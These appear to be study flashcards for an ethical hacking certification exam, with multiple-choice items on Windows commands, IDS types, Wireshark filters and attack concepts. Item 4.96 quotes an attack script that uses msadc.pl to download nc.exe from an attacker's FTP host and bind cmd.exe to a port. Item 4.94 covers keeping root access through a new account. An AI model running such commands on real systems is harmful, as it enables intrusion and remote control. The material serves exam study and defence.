Day 4 76-114 Flashcards

1
Q

4.76 Which command would launch the Computer Management console on a Windows computer? A. gpedit B. ncpa.cpl C. services.msc D. compmgmt.msc

A

D. compmgmt.msc Try running compmgmt.msc from your command prompt! (on a Windows machine, of course)

2
Q

4.77 Which Windows command lists all the shares you have access to? A. NET CONFIG B. NET VIEW C. NET USE D. NET FILE

A

B. NET VIEW Again, try running this command from a Windows machine! If nothing shows up, then you don’t have access to any shares at the moment.

3
Q

4.78 When you return to your desk after a lunch break, you notice a strange email in your inbox. The sender is someone you did business with recently, but the subject line has strange characters in it. What should you do? A. Delete the email and pretend nothing happened B. Reply to the sender and ask them for more information about the message contents C. Forward the message to your supervisor and ask for his opinion on how to handle it D. Forward the message to your security response team and delete the message from your computer

A

D. Forward the message to your security response team and delete the message from your computer

4
Q

4.79 You want to ensure your machines are compliant with the security policy. Which type of tool would you most likely use? A. Port scanner B. Vulnerability scanner C. Protocol analyzer D. Intrusion Detection System

A

B. Vulnerability scanner Both the port scanner and the vulnerability scanner will show you which ports are open. The vuln scanner, however, will show you much more, including which user accounts have weak or missing passwords, which patches are missing, which machines have old or outdated antivirus signatures, and a variety of other weaknesses.

5
Q

4.80 Which protocol is specifically designed to send event messages? A. SMS B. Syslog C. SNMP D. ICMP

A

B. Syslog

6
Q

4.81 Which command-line utility lets you scan through text files and find the regular expressions you define? In other words, which lets you do a “search” for “keywords” in text files? A. Notepad B. Grep C. MS Excel D. Relational database

A

B. Grep

7
Q

4.82 You have two machines. Snort is installed on 192.168.0.99. The next machine is a Syslog server with the IP 192.168.0.150. You do a syn scan on the network, but the Syslog server isn’t getting the alert message from snort. You run Wireshark to see if the messages are being sent to the Syslog server. Which Wireshark filter will show the messages from the snort machine to the Syslog machine? A. tcp.srcport==514 && ip.src==192.168.0.99 B. Tcp.srcport==514 && ip.src==192.168.150 C. Tcp.dstport==514 && ip.dst==192.168.0.0/16 D. Tcp.dstport==514 && ip.dst==192.168.0.150

A

D. Tcp.dstport==514 && ip.dst==192.168.0.150

8
Q

4.83 A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file named “nc”. The FTP server’s access logs show that the anonymous user account logged in to the server, uploaded the files, extracted the contents of the tarball, and ran the script using a function provided by the FTP server’s software. The ps command shows that the nc file is running as a process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible? A. Directory traversal B. Brute force login C. File system permissions D. Privilege escalation

A

D. Privilege escalation

9
Q

4.84 From your computer you try to ping a server on the network. You know it’s up and running, but you don’t get any response from your ping attempts. Why could this be? A. The ARP is disabled on the target server B. ICMP could be disabled on the target server C. TCP/IP doesn’t support ICMP D. You need to run the ping command with root privileges

A

B. ICMP could be disabled on the target server

10
Q

4.85 Which could help determine the attack surface of your company? A. Running a network scan to detect network services in the corporate DMZ B. Using configuration management to determine when and where to apply security patches C. Reviewing the need for a security clearance for each employee D. Training employees on the security policy regarding social engineering

A

A. Running a network scan to detect network services in the corporate DMZ

11
Q

4.86 Your IDS captured some traffic that is possibly malicious. Which type of tool can help you determine if it really was malicious, or if it was just a false positive? A. Vulnerability scanner B. Network sniffer C. Intrusion Prevention System D. Protocol analyzer

A

D. Protocol analyzer

12
Q

4.87 After doing a pen-test, you need to restore systems to a pre-test state. Which of these would NOT be included in this end-step? I. Removing all files uploaded on the system II. Cleaning all registry entries III. Mapping of network state IV. Removing all tools and maintaining backdoor for reporting A. III B. IV C. III and IV D. All should be included

A

B. IV

13
Q

4.88 During an audit of IT processes, you find that there are no documented security procedures. What should you do in this event? A. Terminate the audit B. Create a procedures document C. Conduct compliance testing D. Identify and evaluate existing practices

A

D. Identify and evaluate existing practices

14
Q

4.89 Which of the following is an extremely common IDS evasion technique in the web world? A. Spyware B. Port knocking C. Unicode characters D. Subnetting

A

C. Unicode characters Unicode is an international encoding standard for use with different languages and scripts, by which each letter, digit, or symbol is assigned a unique numeric value that applies across different platforms and programs. An IDS can be evaded by obfuscating or encoding the attack payload in a way that the target computer will reverse but the IDS will not. An adversary could use Unicode encoding to craft attack packets that an IDS would not recognize, but that an IIS web server would decode and then be attacked by.

15
Q

4.90 Which tool could be used for passive operating-system fingerprinting? A. nmap B. ping C. tcpdump D. tracert

A

C. tcpdump While nmap can certainly do OS fingerprinting, it is considered active because you send traffic to the target. Tcpdump, on the other hand, is a sniffer, and by observing differences in the traffic you capture, you can determine the OS that sent the traffic. Tcpdump is passive as it does not send traffic to the target.

16
Q

4.91 Which type of tool would allow you to monitor all network traffic for malicious behavior, and send you an alert when it finds some? A. Firewall B. Proxy C. Network-based IDS D. Host-based IDS

A

C. Network-based IDS

17
Q

4.92 A large and well-organized hacking group will discover vulnerabilities but keep them quiet and hold on to them for later use. If one of these groups was to exploit and utilize several different vulnerabilities against you at once, what would this be considered? A. no-day B. Zero-sum C. Zero-day D. Zero-hour

A

C. Zero-day A Zero-Day attack exploits a previously unknown vulnerability.

18
Q

4.93 A covert channel is a channel that... A. Transfers information over or within a computer system or network that is outside of the security policy B. Transfers information over or within a computer system or network that is encrypted C. Transfers information via a communication path within a computer system or network for transfer of data D. Transfers information over or within a computer system or network that is within the security policy

A

A. Transfers information over or within a computer system or network that is outside of the security policy

19
Q

4.94 You’ve successfully gained root access to a remote server. What is the first thing you should do so that you continue to maintain access to this server? A. Create a user account B. Download and install Netcat C. Disable IPTables D. Disable Key Services

A

A. Create a user account

20
Q

4.95 Which of these is a proxy tool that will let you intercept, test, and analyze your own web traffic in order to help you find vulnerabilities in web apps? A. Proxychains B. Dimitry C. Maskgen D. Burpsuite

A

D. Burpsuite Burp Suite is a Java application that can be used to secure or penetrate web applications. The suite consists of different tools, such as a proxy server, a web spider, intruder and repeater.

21
Q

4.96 A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester comes across a Perl script that runs the following msadc functions: system("perl msadc.pl -h $host -c \"echo open $your >testfile\""); system("perl msadc.pl -h $host -c \"echo $pass>>testfile\""); system("perl msadc.pl -h $host -c \"echo bin>>testfile\""); system("perl msadc.pl -h $host -c \"echo get nc.exe>>testfile\""); system("perl msadc.pl -h $host -c \"echo get hacked.html>>testfile\""); system("perl msadc.pl -h $host -c \"echo quit>>testfile\""); system("perl msadc.pl -h $host -c \"ftp -s: testfile\""); $0=; print "Opening". \n"; system("perl msadc.pl -h $host -c \"nc -I -p $port -e cmd.exe\""); Which exploit is indicated by this script? A. A buffer overflow exploit B. A chained exploit C. A SQL injection exploit D. A denial of service exploit

A

B. A chained exploit

22
Q

4.97 You implement a blacklist for known-malicious IP addresses out on the internet. Immediately after this you get an alert that one of your PCs is connected to one of these blacklisted IPs, which is a known C2 (command-and-control) server. You now need to get a rough idea of how severe this situation is, so which of these should you analyze? A. The IDS log B. Event logs on the Domain Controller (DC) C. Internet Firewall/Proxy log D. Event logs on the PC

A

D. Event logs on the PC The IDS only started logging these packets when you implemented the blacklist, so that won’t be enough info. To find out things like which program/process is causing this traffic, when it was installed, etc., you should look at the event logs on the PC itself.

23
Q

4.98 You’re experiencing slow network traffic, so you’ve decided to start monitoring all internet traffic. Legally speaking, what could cause a problem here? A. Not informing the employees that they are going to be monitored could be an invasion of privacy. B. The network could still experience traffic slowdowns. C. You would be telling employees who the boss is. D. All of the employees would stop normal work activities.

A

A. Not informing the employees that they are going to be monitored could be an invasion of privacy.

24
Q

4.99 Your company has many private IPs and a range of public IPs. Mary in the IT department monitors network traffic and finds that a large number of addresses in both IP ranges are sending traffic to a single IP address on the internet that is blacklisted. It turns out that these company machines have been compromised. Which type of attack is taking place here? A. Advanced Persistent Threat B. Rootkit attack C. Botnet attack D. Spear Phishing attack

A

C. Botnet attack

25
Q

4.100 Which command will launch the Computer Management console on a Windows machine? A. gpedit B. compmgmt.msc C. ncpa.cpl D. services.msc

A

B. compmgmt.msc If you’re not familiar with the Computer Management tool, try running the command in answer B to get an idea of what features it offers you.

26
Q

4.101 Which type of Intrusion Detection System should be used to observe network segments in large environments? A. Host-based Intrusion Detection System (HIDS) B. Firewall C. Honeypot D. Network-based Intrusion Detection System (NIDS)

A

D. Network-based Intrusion Detection System (NIDS)

27
Q

4.102 Your development team just created a new web application for customers that needs three different servers to operate: a web server, an application server, and a database server. Where should you place these servers? A. All 3 servers should be placed internally. B. All three servers should face the internet so they can communicate between themselves. C. The web and database server facing the internet, and the app server on the internal network. D. The web server facing the internet, and the application and database servers on the internal network.

A

D. The web server facing the internet, and the application and database servers on the internal network. Only the web server should be accessible from the internet. From there the server itself can access the internal app & DB servers, but no direct contact should be allowed from internet customers to the app & DB servers.

28
Q

4.103 After gaining control to a user account, how can you gain access to another user account’s confidential files and data? A. Port scanning B. Hacking Active Directory C. Shoulder-surfing D. Privilege Escalation

A

D. Privilege Escalation Once you gain access to a user account, a successful privilege escalation attack could allow you to gain the rights of another user or admin.

29
Q
4.104 Which type of IDS would be best suited to meet these requirements?
    - Monitors system activities
    - Verifies success or failure of an attack
    - Detects attacks that a network based IDS fails to detect
    - Near real time detection and response
    - Does not require additional hardware
    - Lower entry cost

A. Network based IDS

B. Open source based IDS

C. Host based IDS

D. Gateway based IDS

A

C. Host based IDS

30
Q

4.105 Frank from accounting sends you an e-mail threatening you if you don’t “keep your mouth shut” over something you witnessed earlier. You report Frank to HR but he denies having sent that e-mail. What can you use to prove the e-mail did come from Frank? A. Confidentiality B. Integrity C. Authentication D. Non-Repudiation

A

D. Non-Repudiation

31
Q

4.106 To help explain the difference between a signature-based IDS and an anomaly-based IDS, you could say that the anomaly-based IDS can... A. Identify unknown attacks B. Cannot deal with encrypted network traffic C. Requires vendor updates for new threats D. Produces less false positives

A

A. Identify unknown attacks

32
Q

4.107 What’s the best defense against ransomware that encrypts your files? A. Pay the ransom B. Analyze the ransomware to get the decryption key of encrypted data C. Keep some generation of off-line backup D. Use multiple antivirus software programs

A

C. Keep some generation of off-line backup

33
Q

4.108 Review this log file and name the type of activity that was logged:

Time: Oct 20 12:15:21 Port:20 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:23 Port:21 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:26 Port:22 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:29 Port:23 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:31 Port:25 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:33 Port:53 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:35 Port:80 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

A. Teardrop attack targeting 10.10.0.12

B. Denial-of-Service attack targeting 10.10.0.30

C. Port scan targeting 10.10.0.30

D. Port scan targeting 10.10.0.12

A

D. Port scan targeting 10.10.0.12

34
Q

4.109 Which is a command-line based packet sniffer?

A. Nessus

B. Ethereal

C. TCPDump

D. Jack the Ripper

A

C. TCPDump

35
Q

4.110 In a Code Injection attack, the attacker... A. gets the server to execute arbitrary code using a buffer overflow B. gains access to the codebase on the server and inserts new code C. inserts additional code into the javascript running in the browser D. inserts text into a data field that gets interpreted as code

A

D. inserts text into a data field that gets interpreted as code

36
Q

4.111 Which scanning technique splits the TCP header into multiple packets in an attempt to make it harder for packet filters to know the true purpose of the packet? A. SYN/FIN scanning using IP fragments B. IPID scanning C. ACK flag probe scanning D. ICMP Echo scanning

A

A. SYN/FIN scanning using IP fragments

37
Q

4.112 You visit a vendor’s site and they give you a tour of their facility. To access their data center, they must type a phrase using a keyboard. The system identifies individual employees by the way they actually type on the keyboard. After this, the user must also swipe their RFID badge. To open the data center, both identifications are required. What could you say about this method? A. Biological motion cannot be used to identify people. B. Although the approach has two phases, it actually implements just one authentication factor. C. The solution implements the two authentication factors: physical object and physical characteristic. D. The solution will have a high level of false positives

A

C. The solution implements the two authentication factors: physical object and physical characteristic.

38
Q

4.113 Examine this log file entry and pick the true statement:

June 15, 2017 2:15:45 PM 192.168.5.10 – 59888 192.168.6.130 – 22 tcp_ip

A. Application is SSH and 192.168.5.10 is the client and 192.168.6.130 is the server.

B. Application is SSH and 192.168.5.10 is the server and 192.168.6.130 is the client.

C. Application is Telnet and 192.168.5.10 is the client and 192.168.6.130 is the server.

D. SSH communications are encrypted and it’s impossible to know who is the client or the server.

A

A. Application is SSH and 192.168.5.10 is the client and 192.168.6.130 is the server.

39
Q

4.114 You want to capture Facebook website traffic in Wireshark. What display filter should you use that shows all TCP packets that contain the word ‘facebook’? A. display==facebook B. traffic.content==facebook C. tcp contains facebook D. list.display.facebook

A

C. tcp contains facebook